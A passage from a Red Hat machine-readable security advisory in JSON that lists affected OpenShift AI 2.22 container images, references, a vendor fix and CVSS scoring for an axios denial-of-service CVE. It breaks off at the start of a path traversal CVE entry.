"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "RHBZ#2394735",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593",
"url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/pull/7011",
"url": "https://github.com/axios/axios/pull/7011"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.12.0",
"url": "https://github.com/axios/axios/releases/tag/v1.12.0"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj",
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
}
],
"release_date": "2025-09-12T01:16:40.513000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "axios: Axios DoS via lack of data size check"
},
{
"cve": "CVE-2025-62156",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-10-14T15:02:10.015356+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2403800"
}
],
"notes": [
{
"category": "description",
